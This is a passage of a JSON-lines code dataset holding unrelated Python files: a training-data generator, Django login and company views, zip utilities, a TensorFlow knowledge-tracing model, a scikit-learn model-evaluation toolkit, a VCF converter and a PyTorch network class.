_filename)):\n os.makedirs(os.path.join(output_data_folder, _filename))\n\n train_file_data = []\n test_file_data = []\n\n # specific number of zones (zones indices)\n zones = np.arange(16)\n\n # go ahead each scenes\n for folder_scene in _selected_zones:\n\n scene_path = os.path.join(_dataset_folder, folder_scene)\n\n train_zones = _selected_zones[folder_scene]\n\n for id_zone, index_folder in enumerate(zones):\n\n index_str = str(index_folder)\n if len(index_str) < 2:\n index_str = \"0\" + index_str\n \n current_zone_folder = \"zone\" + index_str\n zone_path = os.path.join(scene_path, current_zone_folder)\n\n # custom path for interval of reconstruction and metric\n\n features_path = []\n\n for transformation in _transformations:\n \n # check if it's a static content and create augmented images if necessary\n if transformation.getName() == 'static':\n \n # {sceneName}/zoneXX/static\n static_metric_path = os.path.join(zone_path, transformation.getName())\n\n # img.png\n image_name = transformation.getParam().split('/')[-1]\n\n # {sceneName}/zoneXX/static/img\n image_prefix_name = image_name.replace('.png', '')\n image_folder_path = os.path.join(static_metric_path, image_prefix_name)\n \n if not os.path.exists(image_folder_path):\n os.makedirs(image_folder_path)\n\n features_path.append(image_folder_path)\n\n # get image path to manage\n # {sceneName}/static/img.png\n transform_image_path = os.path.join(scene_path, transformation.getName(), image_name) \n static_transform_image = Image.open(transform_image_path)\n\n static_transform_image_block = divide_in_blocks(static_transform_image, cfg.sub_image_size)[id_zone]\n\n dt.augmented_data_image(static_transform_image_block, image_folder_path, image_prefix_name)\n\n else:\n metric_interval_path = os.path.join(zone_path, transformation.getTransformationPath())\n features_path.append(metric_interval_path)\n\n # as labels are same for each metric\n for label in os.listdir(features_path[0]):\n\n label_features_path = []\n\n for path in features_path:\n label_path = os.path.join(path, label)\n label_features_path.append(label_path)\n\n # getting images list for each metric\n features_images_list = []\n \n for index_metric, label_path in enumerate(label_features_path):\n\n if _transformations[index_metric].getName() == 'static':\n # by default append nothing..\n features_images_list.append([])\n else:\n images = sorted(os.listdir(label_path))\n features_images_list.append(images)\n\n # construct each line using all images path of each\n for index_image in range(0, len(features_images_list[0])):\n \n images_path = []\n\n # get information about rotation and flip from first transformation (need to be a not static transformation)\n current_post_fix = features_images_list[0][index_image].split(cfg.post_image_name_separator)[-1]\n\n # getting images with same index and hence name for each metric (transformation)\n for index_metric in range(0, len(features_path)):\n\n # custom behavior for static transformation (need to check specific image)\n if _transformations[index_metric].getName() == 'static':\n # add static path with selecting correct data augmented image\n image_name = _transformations[index_metric].getParam().split('/')[-1].replace('.png', '')\n img_path = os.path.join(features_path[index_metric], image_name + cfg.post_image_name_separator + current_post_fix)\n images_path.append(img_path)\n else:\n img_path = features_images_list[index_metric][index_image]\n images_path.append(os.path.join(label_features_path[index_metric], img_path))\n\n if 
label == cfg.noisy_folder:\n line = '1;'\n else:\n line = '0;'\n\n # compute line information with all images paths\n for id_path, img_path in enumerate(images_path):\n if id_path < len(images_path) - 1:\n line = line + img_path + '::'\n else:\n line = line + img_path\n \n line = line + '\\n'\n\n if id_zone in train_zones:\n train_file_data.append(line)\n else:\n test_file_data.append(line)\n\n train_file = open(output_train_filename, 'w')\n test_file = open(output_test_filename, 'w')\n\n random.shuffle(train_file_data)\n random.shuffle(test_file_data)\n\n for line in train_file_data:\n train_file.write(line)\n\n for line in test_file_data:\n test_file.write(line)\n\n train_file.close()\n test_file.close()\n\ndef main():\n\n parser = argparse.ArgumentParser(description=\"Compute specific dataset for model using of metric\")\n\n parser.add_argument('--output', type=str, help='output file name desired (.train and .test)')\n parser.add_argument('--features', type=str,\n help=\"list of features choice in order to compute data\",\n default='svd_reconstruction, ipca_reconstruction',\n required=True)\n parser.add_argument('--folder', type=str,\n help='folder where generated data are available',\n required=True) \n parser.add_argument('--params', type=str, \n help=\"list of specific param for each metric choice (See README.md for further information in 3D mode)\", \n default='100, 200 :: 50, 25',\n required=True)\n parser.add_argument('--size', type=str, \n help=\"Size of input images\",\n default=\"100, 100\")\n parser.add_argument('--selected_zones', type=str, help='file which contains all selected zones of scene', required=True) \n\n args = parser.parse_args()\n\n p_filename = args.output\n p_folder = args.folder\n p_features = list(map(str.strip, args.features.split(',')))\n p_params = list(map(str.strip, args.params.split('::')))\n p_size = args.size # not necessary to split here\n p_selected_zones = args.selected_zones\n\n selected_zones = {}\n with(open(p_selected_zones, 'r')) as f:\n\n for line in f.readlines():\n\n data = line.split(';')\n del data[-1]\n scene_name = data[0]\n thresholds = data[1:]\n\n selected_zones[scene_name] = [ int(t) for t in thresholds ]\n\n # create list of Transformation\n transformations = []\n\n for id, feature in enumerate(p_features):\n\n if feature not in features_choices:\n raise ValueError(\"Unknown metric, please select a correct metric : \", features_choices)\n\n transformations.append(Transformation(feature, p_params[id], p_size))\n\n if transformations[0].getName() == 'static':\n raise ValueError(\"The first transformation in list cannot be static\")\n\n\n # create database using img folder (generate first time only)\n generate_data_model(p_filename, transformations, p_folder, selected_zones)\n\nif __name__== \"__main__\":\n main()\n","sub_path":"generate/generate_dataset_file.py","file_name":"generate_dataset_file.py","file_ext":"py","file_size_in_byte":9757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"400005273","text":"from django.shortcuts import render, HttpResponse, redirect\nfrom django.contrib import messages\nfrom apps.LOGIN_APP.models import Users, Company\nimport random, datetime, bcrypt\n\n#LOGIN_APP_VIEWS\n#LOGIN_APP_VIEWS\n#LOGIN_APP_VIEWS\n\n#BEGIN_LOGIN_PAGE_ROUTES\n#BEGIN_LOGIN_PAGE_ROUTES\n#BEGIN_LOGIN_PAGE_ROUTES\ndef index(request): #MAIN INDEX IE LOGIN INDEX\n return render(request,'LOGIN_APP/index.html')\n\ndef processRegistration(request): #REGISTRATION PROCESS ROUTE\n 
errors = Users.objects.validator(request.POST)\n if len(errors) > 0:\n for key, val in errors.items():\n messages.error(request, val)\n return redirect('/')\n else:\n newUserPass = request.POST['password']\n newUserPassEncrypt = bcrypt.hashpw(newUserPass.encode(), bcrypt.gensalt())\n\n newUser = Users.objects.create(\n fname= request.POST['fname'],\n lname= request.POST['lname'],\n username= request.POST['username'],\n birthday= request.POST['birthday'],\n email= request.POST['email'],\n password= newUserPassEncrypt\n )\n request.session['user_live'] = newUser.id\n return redirect('/attic')\n\ndef processLogin(request): #LOGIN PROCESS ROUTE \n errors = Users.objects.loginVal(request.POST)\n if len(errors) > 0:\n for key, val in errors.items():\n messages.error(request, val)\n return redirect('/')\n\n userQuery = Users.objects.get(email= request.POST['email'])\n request.session['user_live'] = userQuery.id\n return redirect('/attic' )\n\n#END_LOGIN_PAGE_ROUTES\n#END_LOGIN_PAGE_ROUTES\n#BEGIN_SUCCESS_PAGE_ROUTES\n#BEGIN_SUCCESS_PAGE_ROUTES\n\ndef success(request): #RENDER SUCCESS, TO INFORM THE USER THAT THEY ARE IN SESSION\n try:\n liveUser = request.session['user_live']\n context ={\n 'user': Users.objects.get(id = liveUser),\n }\n return render(request, 'LOGIN_APP/success.html', context)\n except:\n messages.error(request, 'Must be logged in first')\n return redirect('/')\n\ndef logout(request): #CLEAR USER IN SESSION\n request.session.clear()\n return redirect('/')\n\n#END_SUCCESS_PAGE_ROUTES\n#END_SUCCESS_PAGE_ROUTES\n#BEGIN USER RELATED FUNCTIONS\n#BEGIN USER RELATED FUNCTIONS\n#BEGIN USER RELATED FUNCTIONS\n\ndef userPage(request, userID): #FOR RENDERING A USERS PAGE\n sessionUser = request.session['user_live']\n context = {\n 'thisUser': Users.objects.get(id= userID),\n 'sessionUser': Users.objects.get(id=sessionUser),\n\n }\n\n return render(request, \"LOGIN_APP/userPage.html\", context)\n\n\n#COMPANY STUFF\n#COMPANY STUFF\n#COMPANY STUFF\n#COMPANY STUFF\n\ndef companyPage(request, companyID): #FOR RENDERING A COMPANY PAGE\n try:\n liveUser = request.session['user_live']\n context = {\n 'thisCompany': Company.objects.get(id= companyID),\n 'liveUser': Users.objects.get(id=liveUser),\n }\n\n return render(request, \"LOGIN_APP/companyPage.html\", context)\n except:\n messages.error(request, 'Must be logged in first/BROKE AT COMPANY PAGE')\n return redirect('/')\n\ndef addEmployee(request):#ADDING EMPLOYEES\n newEmployee = request.POST['empname']\n newEmployee = Users.objects.get(username=newEmployee)\n thisCompany = request.POST['thisCompany']\n thisCompany = Company.objects.get(id=thisCompany)\n thisCompany.employee.add(newEmployee)\n thisCompany.save()\n return redirect('/company%s' %(thisCompany.id))\n \n\ndef companyRegForm(request, userID):#COMPANY REGISTRATION FORM\n context = {\n 'thisUser': Users.objects.get(id= userID),\n\n }\n\n return render(request, \"LOGIN_APP/companyForm.html\", context)\n\n\ndef processRegistrationCompany(request, userID): #COMPANY REGISTRATION PROCESS ROUTE\n errors = Company.objects.sessionVal(request.POST)\n if len(errors) > 1:\n for key, val in errors.items():\n messages.error(request, val)\n return redirect('/')\n else:\n\n newCompany = Company.objects.create(\n name= request.POST['name'],\n description= request.POST['description'],\n administrator= Users.objects.get(id=userID),\n )\n return redirect('/user%s' 
%(userID))\n\n#LOGIN_APP_VIEWS\n#LOGIN_APP_VIEWS\n#LOGIN_APP_VIEWS\n#LOGIN_APP_VIEWS","sub_path":"apps/LOGIN_APP/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"312679535","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build\\bdist.win-amd64\\egg\\cloud_training\\utils.py\n# Compiled at: 2017-10-29 21:52:06\n# Size of source mod 2**32: 2402 bytes\nimport logging, os, zipfile, errno\n\ndef data_dir(path: str=''):\n \"\"\"Returns an absolute path to \"data\" directory.\n\n Args:\n path: A path which should be added to the \"data\" path.\n\n \"\"\"\n res_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'data')\n if path:\n res_path = os.path.join(res_path, path)\n return res_path\n\n\ndef zip_dir(path: str):\n \"\"\"Zips non-zip files recursively one by one.\n\n Note:\n \"Unzip\" script is located in the \"unzip.py\" file to be transferred to a remote machine.\n\n Args:\n path: The directory in which the files should be zipped.\n\n \"\"\"\n zip_files_list = []\n for root, dirs, filenames in os.walk(path):\n for filename in filenames:\n _, ext = os.path.splitext(filename)\n if ext == '.zip':\n pass\n else:\n file_path = os.path.join(root, filename)\n zip_file_path = file_path + '.zip'\n if os.path.exists(zip_file_path):\n pass\n else:\n zip_files_list.append((file_path, filename, zip_file_path))\n\n if not zip_files_list:\n logging.debug('No files to zip')\n return\n logging.debug('Zipping files...')\n for file_path, filename, zip_file_path in zip_files_list:\n logging.debug('File: ' + file_path)\n zip_file = zipfile.ZipFile(zip_file_path, 'w', zipfile.ZIP_DEFLATED)\n zip_file.write(file_path, filename)\n zip_file.close()\n\n logging.debug('Done')\n\n\ndef get_last_checkpoint_name(checkpoint_path):\n \"\"\"Returns the last TensorFlow checkpoint name from a \"checkpoints\" directory.\n It's used to avoid a syncing of all saved checkpoints from S3.\n \"\"\"\n if not os.path.exists(checkpoint_path):\n return False\n else:\n with open(checkpoint_path, 'r') as (f):\n last_model_str = f.readline()\n return os.path.basename(last_model_str[24:-2])\n\n\ndef check_path(path):\n \"\"\"Creates a directory if it doesn't exist.\"\"\"\n if not os.path.exists(path):\n try:\n os.makedirs(path)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise","sub_path":"pycfiles/cloud_translator-1.0-py3-none-any/utils.cpython-36.py","file_name":"utils.cpython-36.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"557148467","text":"\"\"\"Definition of the DKT LSTM network\"\"\"\nimport numpy\nimport tensorflow as tf\n\nfrom quick_experiment.models import seq_lstm\n\n\nclass DktLSTMModel(seq_lstm.SeqLSTMModel):\n\n def _build_loss(self, logits):\n \"\"\"Calculates the avg binary cross entropy using the sigmoid function.\n\n Args:\n logits: Tensor - [batch_size, max_num_steps, classes_num]\n \"\"\"\n mask = tf.sequence_mask(self.lengths_placeholder, self.max_num_steps)\n # Labels can be 1 or -1, we will replace the -1 with p(1)=0.\n labels = tf.cast(self.labels_placeholder, logits.dtype)\n loss = tf.nn.sigmoid_cross_entropy_with_logits(\n logits=logits, labels=tf.clip_by_value(labels, 0, 1))\n # loss has shape 
[batch_size, max_num_steps, classes_num]\n # We set to 0 the losses of the predictions of exercises that are not\n # the next one.\n loss = tf.multiply(loss, tf.abs(labels))\n loss = tf.div(\n tf.reduce_sum(tf.boolean_mask(loss, mask)),\n tf.cast(tf.reduce_sum(self.lengths_placeholder), loss.dtype))\n\n if self.logs_dirname:\n tf.summary.scalar('train_loss', loss)\n\n return loss\n\n def _build_predictions(self, logits):\n \"\"\"Return a tensor with the predicted performance of next exercise.\n\n The prediction for each step is float with the probability of the\n next exercise being correct. To know the true next exercise we use\n the id of the exercise that is not 0 from self.labels_placeholder\n\n Args:\n logits: Logits tensor, float - [batch_size, max_num_steps,\n num_classes].\n\n Returns:\n A float64 tensor with the predictions, with shape [batch_size,\n max_num_steps].\n \"\"\"\n predictions = tf.nn.sigmoid(logits)\n # We leave only the predictions for the true next exercise.\n # We use the fact that labels_placeholder can be 1 or -1 for the next\n # exercise.\n predictions = tf.multiply(\n predictions,\n tf.cast(tf.abs(self.labels_placeholder), predictions.dtype))\n # We keep only the predictions that are not 0. Should be only one per\n # step because labels_placeholder is a one hot encoding.\n predictions = tf.reduce_max(predictions, axis=2)\n return predictions\n\n def _get_step_predictions(self, batch_prediction, batch_true, feed_dict):\n step_prediction = self.sess.run(self.predictions, feed_dict=feed_dict)\n labels = numpy.argmax(feed_dict[self.labels_placeholder], axis=-1)\n for index, length in enumerate(feed_dict[self.lengths_placeholder]):\n batch_prediction[index] = numpy.append(\n batch_prediction[index], step_prediction[index, :length])\n batch_true[index] = numpy.append(\n batch_true[index], labels[index, :length])\n\n def predict(self, partition_name, limit=-1):\n \"\"\"Applies the classifier to all elements in partition name.\n\n Returns:\n A tuple (true, predictions). true has the true labels of the\n predicted elements, predictions has the predicted labels of the\n elements. Each label is a the probability of the next exercise\n being correct.\n Both true and predictions are arrays (sequences) of length\n self.dataset.num_examples(partition_name). 
The elements of the list\n are the labels of the sequence represented as an array.\n \"\"\"\n predictions = []\n true = []\n old_start = self.dataset.reset_batch(partition_name)\n with self.graph.as_default():\n while (self.dataset.has_next_batch(self.batch_size, partition_name)\n and (limit <= 0 or len(predictions) < limit)):\n batch_prediction = [numpy.array([]) for\n _ in range(self.batch_size)]\n batch_true = [numpy.array([]) for _ in range(self.batch_size)]\n for feed_dict in self._fill_feed_dict(partition_name,\n reshuffle=False):\n self._get_step_predictions(batch_prediction, batch_true,\n feed_dict)\n predictions.extend(batch_prediction)\n true.extend(batch_true)\n self.dataset.reset_batch(partition_name, old_start)\n return numpy.array(true), numpy.array(predictions)\n\n def _build_evaluation(self, predictions):\n \"\"\"Evaluate the quality of the logits at predicting the label.\n\n Args:\n predictions: Predictions tensor, int - [current_batch_size,\n max_num_steps].\n Returns:\n A scalar float32 tensor with the mean squared error.\n \"\"\"\n # predictions has shape [batch_size, max_num_steps]\n with tf.name_scope('evaluation_performance'):\n mask = tf.sequence_mask(\n self.lengths_placeholder, maxlen=self.max_num_steps,\n dtype=predictions.dtype)\n # We use the mask to ignore predictions outside the sequence length.\n labels = tf.cast(tf.reduce_max(\n self.labels_placeholder, axis=2), predictions.dtype)\n\n mse, mse_update = tf.contrib.metrics.streaming_mean_squared_error(\n predictions, labels, weights=mask)\n\n if self.logs_dirname:\n tf.summary.scalar('eval_mse', mse)\n tf.summary.scalar('eval_up_mse', mse_update)\n\n return mse, mse_update\n\n def evaluate(self, partition='validation'):\n with self.graph.as_default():\n # Reset the metric variables\n stream_vars = [i for i in tf.local_variables()\n if i.name.split('/')[0] == 'evaluation_performance']\n mse, mse_update = self.evaluation_op\n self.dataset.reset_batch(partition)\n mse_value = None\n self.sess.run([tf.variables_initializer(stream_vars)])\n while self.dataset.has_next_batch(self.batch_size, partition):\n for feed_dict in self._fill_feed_dict(partition,\n reshuffle=False):\n feed_dict[self.dropout_placeholder] = 0\n self.sess.run([mse_update], feed_dict=feed_dict)\n mse_value = self.sess.run([mse])[0]\n\n return mse_value\n\n","sub_path":"models/dkt.py","file_name":"dkt.py","file_ext":"py","file_size_in_byte":6453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"332270293","text":"## Created by Paul de Fusco\n## Custom Visualization Methods\n\n#%load_ext autoreload\n\n#%autoreload 2\n\n#Utilities\nimport os\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n#Models\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.linear_model import RidgeClassifier\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.linear_model import PassiveAggressiveClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.tree import ExtraTreeClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.ensemble import BaggingClassifier\nfrom sklearn.ensemble import 
RandomForestClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\n#Preprocessing\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder, OrdinalEncoder, LabelEncoder, Binarizer, LabelBinarizer\nfrom sklearn.model_selection import train_test_split, GridSearchCV, cross_val_score, StratifiedKFold\n\n### Execute the workflow in the order as shown below ###\n\n#Create random nulls - optional\ndef create_nulls(df):\n\n y = pd.DataFrame(df.target)\n df.drop('target', axis=1, inplace=True)\n #Change the probabilities to obtain more or less nulls\n df_new = df.mask(np.random.choice([True, False], size=df.shape, p=[.01,.99]))\n df_new['target'] = y\n\n return df_new\n\n#Models to be evaluated - can be modified/overridden to include more\ndef models():\n models = {}\n models['log'] = (LogisticRegression(solver='lbfgs'), {'C':[0.01, 0.1, 1]})\n models['ridge'] = (RidgeClassifier(), {'alpha':[0.01, 0.1, 1]})\n models['svc'] = (SVC(), {'C':[0.1, 1], 'gamma':['auto']})\n models['gaus_nb'] = (GaussianNB(), {'var_smoothing':[1e-9, 1]})\n models['bagging_class'] = (BaggingClassifier(), {'n_estimators':[7,12], 'max_samples':[1,5]})\n models['rf_class'] = (RandomForestClassifier(), {'max_depth':[100, 1000], 'max_leaf_nodes':[10, 20, 30]})\n \n return models\n\n#Preprocessing pipeline - accounts only for numeric features and categorical one hot encodings\n#Can be augmented with label encoder, ordinal encoder, etc.\ndef processing_pipeline(numeric_features, categorical_features, bin_features, lab_bin_features, classifier):\n\n #numeric_features and categorical_features must be lists\n\n numeric_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='mean')),\n ('scaler', StandardScaler())])\n\n categorical_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='most_frequent')),\n ('onehot', OneHotEncoder(handle_unknown='ignore'))])\n \n binary_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='most_frequent')),\n ('binary', Binarizer())])\n \n label_binary_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='most_frequent')),\n ('label_binary', OneHotEncoder(sparse=False))])\n\n preprocessor = ColumnTransformer(\n transformers=[\n ('num', numeric_transformer, numeric_features),\n ('cat', categorical_transformer, categorical_features),\n ('bin', binary_transformer, bin_features), \n ('lab_bin', label_binary_transformer, lab_bin_features) \n ], #setting remainder to passthrough so features that are not included are not dropped\n remainder='passthrough'\n \n )\n\n # Append classifier to preprocessing pipeline.\n # Now we have a full prediction pipeline.\n pipe = Pipeline(steps=[('preprocessor', preprocessor),\n ('clf', classifier)])\n\n return pipe\n\n#Split data between training and test sets\ndef split_data(df, target_name, test_size):\n\n X = df.drop(str(target_name), axis=1)\n y = df[str(target_name)]\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state = 1)\n\n return X_train, X_test, y_train, y_test\n\n#Evaluate classifiers:\ndef evaluate_classifier(X_train, X_test, y_train, y_test, pipe, classifier_paramgrid, metric):\n\n #NB: classifier_paramgrid should be a tuple with the classifier and its associated param grid for GridsearchCV\n\n classifier, param_grid = classifier_paramgrid[0], 
classifier_paramgrid[1]\n\n new_param_grid = {}\n for i,k in param_grid.items():\n j = 'clf__'+i\n new_param_grid[j] = k\n\n #Using stratified kfold to address imbalanced classes in target feature:\n cv = StratifiedKFold(n_splits=5, random_state=1)\n\n gs = GridSearchCV(estimator=pipe, param_grid=[new_param_grid], n_jobs=-1, cv=cv, scoring=metric)\n\n gs.fit(X_train, y_train)\n\n cv_metric = cross_val_score(gs, X_train, y_train, cv=cv)\n\n print(\"\\n---------\")\n print(\"Model Evaluated: \", classifier_paramgrid[0])\n print(\"Training {} Mean with CV: {}\".format(metric, cv_metric.mean()))\n print(\"Training {} Standard Dev with CV: {}\".format(metric, cv_metric.std()))\n print(\"Test Score: %.3f\" % gs.score(X_test, y_test))\n\n return cv_metric\n\n#Main function to execute the workflow\ndef execute_spotcheck(df, target_name, test_size, numeric_features, categorical_features, bin_features, lab_bin_features):\n\n #Split the data so to leave a final test set to avoid data leakage\n X_train, X_test, y_train, y_test = split_data(df, target_name, test_size)\n\n #Create a dictionary holding models that will be evaluated\n models_tested = models()\n\n model_results = {}\n\n for k, (model, params) in models_tested.items():\n #Create pipeline to apply the same transformations to each model evaluated\n pipe = processing_pipeline(numeric_features, categorical_features, bin_features, lab_bin_features, model)\n cv_metric = evaluate_classifier(X_train, X_test, y_train, y_test, pipe, (model, params), 'accuracy')\n model_results[k] = cv_metric\n\n return model_results, models_tested\n\n#Simple visualization of outcomes:\ndef visualize_results(model_results, models_tested):\n \n models_report = pd.DataFrame(model_results, columns=list(models_tested.keys()))\n \n fig, ax1 = plt.subplots(figsize=(len(models_report.columns)*3,4))\n sns.boxplot(data=models_report, ax=ax1)\n plt.suptitle('Model Evaluation Report')\n plt.show()\n\n \ndef test():\n print('this is a test')","sub_path":"machine_learning_projects/churn_prediction/lib/model_eval_toolkit.py","file_name":"model_eval_toolkit.py","file_ext":"py","file_size_in_byte":6675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"278501992","text":"import sys,getopt\r\n\r\ndef main(argv):\r\n inputfile = \"\"\r\n outputfile = \"\"\r\n\r\n try:\r\n # 这里的 h 就表示该选项无参数,i:表示 i 选项后需要有参数\r\n opts, args = getopt.getopt(argv, \"hi:o:\", [\"infile=\", \"outfile=\"])\r\n except getopt.GetoptError:\r\n print('Error: test_arg.py -i -o ')\r\n print( ' or: test_arg.py --infile= --outfile=')\r\n sys.exit(2)\r\n\r\n for opt, arg in opts:\r\n if opt == \"-h\":\r\n print('test_arg.py -i -o ')\r\n print('or: test_arg.py --infile= --outfile=')\r\n sys.exit()\r\n elif opt in (\"-i\", \"--infile\"):\r\n inputfile = arg\r\n elif opt in (\"-o\", \"--outfile\"):\r\n outputfile = arg\r\n\r\n\r\n\r\n with open(inputfile) as fp1:\r\n list1 = fp1.readlines()\r\n\r\n last_list = []\r\n for i in list1:\r\n if i[0] == \"#\":\r\n if i[1] == \"#\":\r\n continue\r\n else:\r\n # 输出行第一行的生成\r\n i = i.strip('\\n') # 去掉每行输入的最后的换行符\r\n str_split = i.split('\\t') # 把每行输入以空格切割开\r\n # print(str_split)\r\n str_split = str_split[9:] # 根据原vcf文件的格式,取第9个元素之后的内容\r\n # print(str_split)\r\n last_list_item = 'CHR:POS'+'\\t'+'CHR'+'\\t'+'GeneticPos'+'\\t'+'POS'+'\\t'+'REF'+'\\t'+'ALT'+'\\n'\r\n last_list.append(last_list_item)\r\n else:\r\n i = i.strip('\\n')\r\n str_split = i.split('\\t')\r\n last_list_item = 
str_split[2]+'\\t'+str_split[0]+'\\t'+'0'+'\\t'+str_split[1]+'\\t'+str_split[3]+'\\t'+str_split[4]+'\\n'\r\n\r\n # print(str_split)\r\n\r\n last_list.append(last_list_item)\r\n\r\n outputString = ''\r\n for eachone in last_list:\r\n outputString = outputString + eachone\r\n data = open(outputfile, 'w+')\r\n print(outputString, file=data)\r\n data.close()\r\n\r\nif __name__ == \"__main__\":\r\n main(sys.argv[1:])\r\n# print(last_list)\r\n\r\n\r\n","sub_path":"python/vcf2format1/vcf2xpdr.py","file_name":"vcf2xpdr.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"95178148","text":"import torch as tc\nimport torch.nn as nn\nimport torch.optim as optim\n\n\n\nclass Network(nn.Module):\n def __init__(self, net_plane: list,activate: str = \"Sigmoid\", reduction: str = \"mean\", optimizer_lr: float = 0.01):\n super(Network,self).__init__()\n self.criterion = nn.MSELoss(reduction=reduction)\n if activate == \"ReLU\":\n self.activate = nn.ReLU()\n elif activate == \"Sigmoid\":\n self.activate = nn.Sigmoid()\n elif activate == \"Tanh\":\n self.activate = nn.Tanh()\n elif activate == \"LeakyReLU\":\n self.activate = nn.LeakyReLU()\n elif activate == \"RReLU\":\n self.activate = self.activate = nn.RReLU()\n elif activate == \"Hardsigmoid\":\n self.activate = self.activate = nn.Hardsigmoid()\n elif activate == \"Hardtanh\":\n self.activate = self.activate = nn.Hardtanh()\n elif activate == \"Hardswish\":\n self.activate = self.activate = nn.Hardswish()\n elif activate == \"Softplus\":\n self.activate = self.activate = nn.Softplus()\n elif activate == \"Softshrink\":\n self.activate = self.activate = nn.Softplus()\n elif activate == \"Tanhshrink\":\n self.activate = self.activate = nn.Tanhshrink()\n elif activate == \"GELU\":\n self.activate = self.activate = nn.GELU()\n elif activate == \"CELU\":\n self.activate = self.activate = nn.CELU()\n elif activate == \"SELU\":\n self.activate = self.activate = nn.SELU()\n elif activate == \"ReLU6\":\n self.activate = self.activate = nn.ReLU6()\n elif activate == \"PReLU\":\n self.activate = self.activate = nn.PReLU()\n elif activate == \"LogSigmoid\":\n self.activate = self.activate = nn.LogSigmoid()\n elif activate == \"Softmax\":\n self.activate = self.activate = nn.Softmax()\n self.layers = nn.Sequential()\n plane_index = 0\n layer_index = 0\n for layer_ in range(len(net_plane)-1):\n self.layers.add_module(name=str(layer_index),module=nn.Linear(in_features=net_plane[plane_index],out_features=net_plane[plane_index+1]))\n plane_index += 1\n layer_index += 1\n self.layers.add_module(name=str(layer_index), module=self.activate)\n layer_index += 1\n\n\n \"\"\"Values from training\"\"\"\n self.loss = None\n self.output_from_net = None\n self.optimizer = optim.SGD(params=self.parameters(),lr=optimizer_lr)\n\n def forward(self, inputs):\n return self.layers(inputs)\n\n def training_net(self,inputs, must_outputs):\n self.optimizer.zero_grad()\n self.output_from_net = self.forward(inputs)\n self.loss = self.criterion(self.output_from_net, must_outputs)\n self.loss.backward()\n self.optimizer.step()\n return self.output_from_net\n def save(self, path):\n tc.save(self.layers,path)\n def load(self, path: str):\n self.layers = tc.load(path)\n\n\n\"\"\"from tqdm import tqdm\nimport numpy as np\n\nimport torch\nfrom torch import nn\nfrom torch import tensor\nfrom torch import optim\n\nimport matplotlib.pyplot as plt\n\ntorch.manual_seed(0)\ndevice = 'cpu'\n\n# XOR gate inputs 
and outputs.\nX = xor_input = tensor([[0,0], [0,1], [1,0], [1,1]]).float().to(device)\nY = xor_output = tensor([[0],[1],[1],[0]]).float().to(device)\n\n\n# Use tensor.shape to get the shape of the matrix/tensor.\nnum_data, input_dim = X.shape\nprint('Inputs Dim:', input_dim) # i.e. n=2 \n\nnum_data, output_dim = Y.shape\nprint('Output Dim:', output_dim) \nprint('No. of Data:', num_data) # i.e. n=4\n\n# Step 1: Initialization. \n\n# Initialize the model.\n# Set the hidden dimension size.\nhidden_dim = 5\n# Use Sequential to define a simple feed-forward network.\nmodel = nn.Sequential(\n # Use nn.Linear to get our simple perceptron.\n nn.Linear(input_dim, hidden_dim),\n # Use nn.Sigmoid to get our sigmoid non-linearity.\n nn.Sigmoid(),\n # Second layer neurons.\n nn.Linear(hidden_dim, output_dim),\n nn.Sigmoid()\n )\nmodel\n\n# Initialize the optimizer\nlearning_rate = 0.3\noptimizer = optim.SGD(model.parameters(), lr=learning_rate)\n\n# Initialize the loss function.\ncriterion = nn.MSELoss()\n\n# Initialize the stopping criteria\n# For simplicity, just stop training after certain no. of epochs.\nnum_epochs = 5000 \n\nlosses = [] # Keeps track of the loses.\n\n# Step 2-4 of training routine.\n\nfor _e in tqdm(range(num_epochs)):\n # Reset the gradient after every epoch. \n optimizer.zero_grad() \n # Step 2: Foward Propagation\n predictions = model(X)\n\n # Step 3: Back Propagation \n # Calculate the cost between the predictions and the truth.\n loss = criterion(predictions, Y)\n # Remember to back propagate the loss you've computed above.\n loss.backward()\n\n # Step 4: Optimizer take a step and update the weights.\n optimizer.step()\n\n # Log the loss value as we proceed through the epochs.\n losses.append(loss.data.item())\n\n\nplt.plot(losses)\nplt.show()\"\"\"","sub_path":"work/0.0.2/Network/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":5103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"21642100","text":"import os\nfrom os.path import join as pjoin\nfrom os.path import isdir\n\n\n\nclass IO:\n \"\"\"Class 